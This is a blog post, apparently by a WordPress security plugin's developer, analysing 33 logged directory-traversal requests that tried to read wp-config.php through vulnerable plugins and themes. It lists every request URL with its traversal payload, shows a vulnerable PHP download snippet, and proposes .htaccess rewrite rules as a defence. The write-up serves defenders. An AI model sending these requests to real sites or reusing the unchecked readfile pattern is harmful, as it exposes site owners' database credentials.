Prevent exposure of wp-config.php

From July to September in 2015, 33 types of malicious requests to attempt exposing the wp-config.php via vulnerable plugins and themes had been observed on my site. I analyzed all of them to identify if IP Geo Block can block them or not.

Unfortunately, I could not find all the causes of exposure because most of them were already removed from the WordPress repository. So I can’t say the right thing with confidence, but the only 2 of these could be blocked by IP Geo Block 2.1.5 and under even if they were from the forbidden countries.

In this article, I should clarify how to prevent exposure of wp-config.php against such malicous requests.

Analysis of Attack Vectors

Before showing the results, I should explain about the description of the terms same as in the previous article.

Attack Vector = Type x Path

where:

The “Path” can be categorized into below:

Abbreviation of Path Description
WP It loads WordPress Core through wp-load.php.
PD It is called Plugin Directly without loading WP Core.
N/A Unknown because the source code is Not Available.

Here’s the table of 33 requests that were attempted to expose wp-config.php in my site. Most of them were disclosed recently. IP Geo Block 2.1.5 and under can only protect the Path of WP, while the PD (and probably N/A) can not because those plugins and themes never load the WordPress core.

Type Path Disclosed Request
AFD PD 2015-08-10 /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
RFD PD 2015-07-16 /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=../../../../wp-config.php
AFD PD 2015-07-12 /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../wp-config.php
AFD PD 2015-07-09 /wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php
RFD PD 2015-07-05 /wp-content/plugins/image-export/download.php?file=../../../wp-config.php
AFD PD 2015-07-05 /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php
RFD WP 2015-07-05 /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php
RFD WP 2015-07-02 /wp-content/plugins/wp-swimteam/include/user/download.php?file=../../../../../wp-config.php&filename=../../../../../wp-config.php&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
AFD PD 2015-06-10 /wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
AFD N/A 2015-04-18 /wp-content/plugins/wp-moN/Assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php
RFD N/A 2015-04-13 /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
AFD PD 2015-03-26 /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
LFD N/A 2015-02-16 /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/markant/download.php?file=../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/felis/download.php?file=../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
AFD N/A 2014-12-24 /wp-content/themes/yakimabait/download.php?file=./wp-config.php
LFI N/A 2014-12-07 /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
AFD N/A 2014-12-06 /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
AFD PD 2014-09-09 /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php
AFD N/A 2014-09-08 /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
AFD N/A 2014-09-08 /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
AFD N/A 2014-09-07 /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
AFD N/A 2014-09-07 /wp-content/themes/epic/includes/download.php?file=wp-config.php
LFI N/A 2014-09-03 /wp-admiN/Admin-ajax.php?action=revslider_show_image&img=../wp-config.php
LFI N/A 2014-04-14 /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
AFD N/A 2014-08-31 /wp-content/themes/lote27/download.php?download=../../../wp-config.php
AFD PD 2014-08-01 /wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php
RFD N/A 2011-09-19 /wp-content/plugins/filedownload/download.php?path=../../../wp-config.php&type=aplication/pdf

What’s the cause?

As you can see, most of them had their own download function like download.php. Typical OMG emoji code in there are like this:

<?php
$file = $_GET['file'];
if (file_exists('../../uploads/xxxx/'.$file)) {
    readfile('../../uploads/xxxx/'.$file);
    exit();
}
?>

This kind of vulnerability is caused by Directory Traversal attack.

I’m not sure why some authers tend to such a direct requesting without loading WordPress core (do they mind speed?), but they should know why so many WordPress plugins vulnerable and absolutely use some of WordPress framework unless they can’t keep their products secure by their own.

How to protect my site against such OMG code?

First and foremost, we should consider to make the Path transformed from PD and N/A to WP. If those plugins and themes would load WordPres core before they were excuted, IP Geo Block can have a chance to block the attacks.

So we should force those plugins and themes to load the wp-load.php. To achieve this, .htaccess in the plugins directory can be configured to rewrite a request to rewrite.php by following directives:

# BEGIN IP Geo Block
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /wp-content/plugins/ip-geo-block/
RewriteCond %{REQUEST_URI} !ip-geo-block/rewrite.php$
RewriteRule ^.*\.php$ rewrite.php [L]
</IfModule>
# END IP Geo Block

The absolute path /wp-content/plugins/ should be changed according to your site configuration. And here’s the example of .htaccess in the themes directory:

# BEGIN IP Geo Block
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteBase /wp-content/plugins/ip-geo-block/
RewriteRule ^.*\.php$ rewrite.php [L]
</IfModule>
# END IP Geo Block

Those will redirect a request, which is pointed to /wp-content/plugins/.../*.php and to /wp-content/themes/.../*.php, to the rewrite.php in IP Geo Block to load wp-load.php and then it will be validated by country code or WP-ZEP emoji .

Another consideration for Type in Attack Vector is that IP Geo Block should filter out the “Malicious signature” such as wp-config.php or passwd to defence against attacks from the permitted countries.

I’ll provide you this functionarity in the next release (may be 2.2.0) !! emoji